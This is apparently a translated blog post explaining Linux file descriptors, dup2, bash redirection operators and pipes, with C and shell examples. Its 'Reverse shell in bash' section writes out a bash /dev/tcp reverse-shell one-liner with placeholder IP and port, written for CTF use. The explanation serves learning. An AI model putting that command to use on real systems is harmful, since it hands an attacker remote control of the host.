Redirection in bash

Some rambling up front

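Recently, while solving some web challenges, I needed to use bash to open a reverse shell on the target host. I'm not that familiar with the commands involved (they rely on all sorts of output redirection, whereas an easy pwn challenge usually needs nothing more than system("sh")), so I tend to copy something off the internet and use it as is. This time the one I copied turned out to be broken, which was really annoying. I ended up reading through the documentation on file descriptors to fix it, and figured I might as well write a post about it.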

This is closer to a set of casual notes, so feel free to skip around if it gets boring.

File descriptor

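In the design of the Linux kernel, “Everything is a file” is an important concept: whether a program wants to read a file, drive a network card, or talk to a device attached to a serial port, the I/O is done through file-like operations such as read and write. The file descriptor is the handle Linux gives user programs to make those operations convenient.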

From man 2 open:

The return value of open() is a file descriptor, a small, nonnegative integer that is used in subsequent system calls (read(2), write(2), lseek(2), fcntl(2), etc.) to refer to the open file.

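So when we call the open function (that is, the system call) and it succeeds, the kernel returns a small non-negative integer to the program, which can then be passed to subsequent file operations such as read, write, and lseek.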

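Readers familiar with C will recognize that compiling the following program and running it in a terminal reads the contents of hello and prints them to the terminal.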

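#include <unistd.h>
#include <fcntl.h>
char buf[0x100];

int main() {
  int fd = open("hello", O_RDONLY);  /* returns -1 on failure */
  if (fd < 0) return 1;

  ssize_t n = read(fd, buf, sizeof(buf));  /* number of bytes actually read */
  if (n > 0) write(1, buf, n);             /* write only what was read */
  close(fd);
  return 0;
}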

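The fd in the program is the file descriptor of that file, and 1 is the file descriptor used to write to the terminal (standard output).
Which brings us back to the earlier line: “Everything is a file”.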

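At this point you may wonder: do different programs get the same file descriptor when they open the same file?

Not necessarily. A file descriptor is only meaningful within its own process. A process has exactly as many file descriptors as it has open files, and the fd a given file ends up with depends on the order in which the files were opened.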

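Now for the implementation. Inside struct task_struct there is a struct files_struct, the structure related to a process's file I/O, and its member struct fdtable __rcu *fdt is what keeps track of the file descriptors.

Side note: struct task_struct is the structure the Linux kernel uses to record all the information about a process.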

/*
 * Open file table structure
 */
struct files_struct {
    /*
     * read mostly part
     */
    atomic_t count;
    bool resize_in_progress;
    wait_queue_head_t resize_wait;

    struct fdtable __rcu *fdt; /* <--- */
    struct fdtable fdtab;
    /*
     * written part on a separate cache line in SMP
     */
    spinlock_t file_lock ____cacheline_aligned_in_smp;
    unsigned int next_fd;
    unsigned long close_on_exec_init[1];
    unsigned long open_fds_init[1];
    unsigned long full_fds_bits_init[1];
    struct file __rcu * fd_array[NR_OPEN_DEFAULT];
};

The fd member of struct fdtable points to an array of struct file *, and the file descriptor we get back from open is simply the index in that array where the pointer for the file is stored.

struct fdtable {
    unsigned int max_fds;
    struct file __rcu **fd;      /* current fd array */
    unsigned long *close_on_exec;
    unsigned long *open_fds;
    unsigned long *full_fds_bits;
    struct rcu_head rcu;
};

To avoid confusion, for the rest of this post I will use
fd for a file descriptor variable
fdlist for the array in fdtable that the file descriptors index into

Redirection

Once you understand how file descriptors work, it is easy to see how redirection is done.

For example, to store the string "Hello world" in output_file, we would run

bash$ echo "Hello world" > output_file

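Roughly, the whole line means: run echo "Hello world" and send its output to output_file.
In terms of implementation, bash replaces standard output (stdout) with output_file before running echo "Hello world", so the output ends up written to output_file.

Expressed in C, that is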

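#include <unistd.h>
#include <fcntl.h>
#include <string.h>

void echo(const char *s) {
  write(1, s, strlen(s));
}

int main() {
  /* like bash's >, create the file if needed and truncate it */
  int fd = open("output_file", O_WRONLY | O_CREAT | O_TRUNC, 0666);
  if (fd < 0) return 1;
  dup2(fd, 1);   /* fd 1 (stdout) now refers to output_file */
  close(fd);     /* the extra descriptor is no longer needed */
  echo("Hello world\n");

  return 0;
}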

Note the dup2 function here; it is the trick that redirection relies on.
An excerpt from man dup:

int dup2(int oldfd, int newfd);
The dup2() system call creates a copy of the file descriptor oldfd, using the file descriptor number specified in newfd.

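dup2(oldfd, newfd) makes newfd a copy of oldfd (closing newfd first if it was already open). What the Linux kernel actually does is put the pointer stored at oldfd into newfd, which changes the actual target of a write to newfd.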

fdlist[newfd] = fdlist[oldfd]
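
As a rough shell-level illustration of the same idea (a sketch, not a description of bash internals), the snippet below saves stdout in a spare descriptor, points stdout at a file, and then restores it. The scratch file from mktemp and the choice of fd 3 are my own assumptions for the demo.

```shell
#!/bin/sh
# Sketch: each exec line is roughly one dup2-style assignment on the shell's own fds.
tmp=$(mktemp)          # scratch file for the demo (assumed name, not from the post)

exec 3>&1              # fdlist[3] = fdlist[1]  (keep a copy of the real stdout)
exec 1>"$tmp"          # fdlist[1] = open(tmp)  (stdout now refers to the file)
echo "Hello world"     # written to the file, not the terminal
exec 1>&3 3>&-         # fdlist[1] = fdlist[3], then close fd 3

result=$(cat "$tmp")
echo "file contains: $result"
```

The echo in the middle never changes; only the slot it writes to gets swapped underneath it.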

Redirections in bash

Next, the various redirections in bash.

Shells differ in implementation and behavior, so only bash is covered here.

`<`, `>` (Redirecting Input/Output)

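Used for I/O redirection. The format is [n]<word / [n]>word.
After word is expanded to a file name, the file is opened with O_RDONLY for < or O_WRONLY for > (which also creates the file if needed and truncates it) to get an fd, followed by dup2(fd, n). n is optional and defaults to 0 and 1 respectively.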
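
A small sketch of the optional n, assuming a scratch directory from mktemp and made-up file names (in, out, err): leaving n out uses the default, while writing it explicitly picks the descriptor to replace.

```shell
#!/bin/sh
tmp=$(mktemp -d)                      # scratch directory for the demo (assumption)
printf 'first\nsecond\n' > "$tmp/in"  # n omitted: ">" means "1>"

# n omitted: "<" means "0<", so read takes its stdin from the file.
read -r line < "$tmp/in"

# n given explicitly: stdout (1) and stderr (2) go to different files.
sh -c 'echo to-stdout; echo to-stderr >&2' 1> "$tmp/out" 2> "$tmp/err"

echo "line=$line out=$(cat "$tmp/out") err=$(cat "$tmp/err")"
```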

`<&`, `>&` (Duplicating File Descriptors)

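Used to duplicate an fd. The format is [n]<&word / [n]>&word.
After word is expanded to a non-negative integer fd, dup2(fd, n) is performed. n is optional and defaults to 0 and 1 respectively.

man bash says that the word in [n]<&word must expand to an fd open for input, and the one in [n]>&word to an fd open for output, but in my tests either form worked with either kind of fd (?), which is a bit odd. A likely reason is that both forms come down to dup2, which does not check the access mode.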
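
The observation above can be reproduced with a sketch like the following. It assumes fd 3 is free and uses a scratch file from mktemp; the behavior shown is what I would expect from bash, and other shells may be stricter.

```shell
#!/bin/sh
tmp=$(mktemp)            # scratch file for the demo (assumption)
exec 3>"$tmp"            # fd 3 is open for writing only

echo "via 1>&3" 1>&3     # the documented form for an output fd
echo "via 1<&3" 1<&3     # the "input" form, still a dup2(3, 1) underneath

exec 3>&-                # close fd 3 again
cat "$tmp"
```

If both lines show up in the file, the shell did not care which of the two operators was used to duplicate a write-only fd.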

`&>` (Output Redirecting)

A special form. The format is &>word, and it is equivalent to >word 2>&1.

`<>` (Opening File Descriptor for R/W)

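Used to open an fd on a file for both reading and writing. The format is [n]<>word.
After word is expanded to a file name, the file is opened to get an fd, followed by dup2(fd, n). n is optional and defaults to 0.

Order also matters when using these: redirections are processed from left to right, so a careless order overwrites an fd that has already been redirected.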
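
To make the read-write part concrete, here is a minimal sketch, assuming fd 3 is free and using a scratch file from mktemp. The same descriptor is first read from and then written to, and the write lands at the offset the read left behind.

```shell
#!/bin/sh
tmp=$(mktemp)            # scratch file for the demo (assumption)
printf 'hello\n' > "$tmp"

exec 3<>"$tmp"           # one fd, opened read-write, without truncating the file
read -r first <&3        # reads "hello"; the file offset moves past that line
echo "world" >&3         # written at the current offset, i.e. after "hello"
exec 3>&-                # close fd 3 again

cat "$tmp"
```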

# stdout -> dirlist first, then stderr -> copy of stdout (dirlist)
ls > dirlist 2>&1 # correct: both end up in dirlist

# stderr -> copy of stdout (still the terminal) first, then stdout -> dirlist
ls 2>&1 > dirlist # wrong: stderr still goes to the terminal
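
The two orders can be compared side by side with a sketch like this one. noisy is a hypothetical helper that prints one line to each stream, and the file names are made up for the demo; the command substitution simply stands in for "wherever stdout pointed before".

```shell
#!/bin/sh
tmp=$(mktemp -d)                       # scratch directory for the demo (assumption)
noisy() { echo out; echo err >&2; }    # hypothetical helper: one line per stream

# Correct order: stdout goes to the file, then stderr copies stdout.
noisy > "$tmp/both" 2>&1

# Wrong order: stderr copies the old stdout (captured by $(...) here),
# and only afterwards does stdout move to the file.
leaked=$(noisy 2>&1 > "$tmp/only_out")

echo "both:     $(tr '\n' ' ' < "$tmp/both")"
echo "only_out: $(cat "$tmp/only_out")"
echo "leaked:   $leaked"
```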

Reverse shell in bash

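We are one step away from a reverse shell in bash. The last thing to know is that, in redirections, bash lets you use /dev/tcp/<IP>/<PORT> and /dev/udp/<IP>/<PORT> as pseudo files, for example (run each command in its own terminal):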

nc -vlkp 8888 <<< "PING"
cat < /dev/tcp/127.0.0.1/8888 2>&1

Put the pieces together and you get this.
(Note that bash does its network operations by opening an fd on a socket, so the fd can be both read from and written to.)

bash -c "bash -i < /dev/tcp/<IP>/<PORT> 1<&0 2<&0"

With that understood, I trust readers can now write a reverse shell off the top of their head XD

Pipe

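As a supplement, a few words on pipes.
A pipe differs from a redirection: a redirection targets a file, while a pipe targets a process.

For example, to pull the lines containing “hello” out of a file, you would write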

cat somefile | grep "hello"

A possible implementation in C:

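#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <sys/wait.h>
#define SIZE 0x100

void cat(const char *filename) {
  char command[SIZE];
  snprintf(command, SIZE, "cat %s", filename);
  system(command);
}

void grep(const char *needle) {
  char command[SIZE];
  snprintf(command, SIZE, "grep %s", needle);
  system(command);
}

int main() {
  int pipefd[2];
  pipe(pipefd);

  if (fork()) {
    /* parent: stdout becomes the write end of the pipe */
    dup2(pipefd[1], 1);
    close(pipefd[0]);
    close(pipefd[1]);
    cat("somefile");
    close(1);      /* last write end closed, so grep sees EOF */
    wait(NULL);
  }
  else {
    /* child: stdin becomes the read end of the pipe */
    dup2(pipefd[0], 0);
    close(pipefd[0]);
    close(pipefd[1]);  /* otherwise the child itself keeps the pipe open */
    grep("hello");
  }

  return 0;
}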

This too works by swapping fds. The difference is that it uses the pipe system call to create a pair of fds through which the two programs can communicate.

int pipe(int pipefd[2]);
pipe() creates a pipe, a unidirectional data channel that can be used for interprocess communication. The array pipefd is used to return two file descriptors referring to the ends of the pipe. pipefd[0] refers to the read end of the pipe. pipefd[1] refers to the write end of the pipe. Data written to the write end of the pipe is buffered by the kernel until it is read from the read end of the pipe.

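From man pipe we learn that the pipe function returns two fds, one usable only for reading and the other only for writing.
Under the hood, the Linux kernel creates a virtual file inside the kernel through pipefs, and user programs communicate across processes by reading from and writing to that file through this pair of fds.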

Pipelines in bash

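The one thing to watch out for is that the pipe (|) is connected before any redirection (>) is applied, so the redirection then overrides the pipe. If you write the following in bash, cat will not receive "Hello".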

echo Hello > somefile | cat
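
A quick way to check this for yourself, as a sketch that uses a scratch file from mktemp in place of somefile: capture whatever cat receives and compare it with what ended up in the file.

```shell
#!/bin/sh
tmp=$(mktemp)                       # stands in for somefile (assumption)

# echo's stdout is first wired to the pipe, then re-pointed at the file,
# so nothing is ever written into the pipe that cat reads from.
got=$(echo Hello > "$tmp" | cat)

echo "cat received:  [$got]"
echo "file contains: [$(cat "$tmp")]"
```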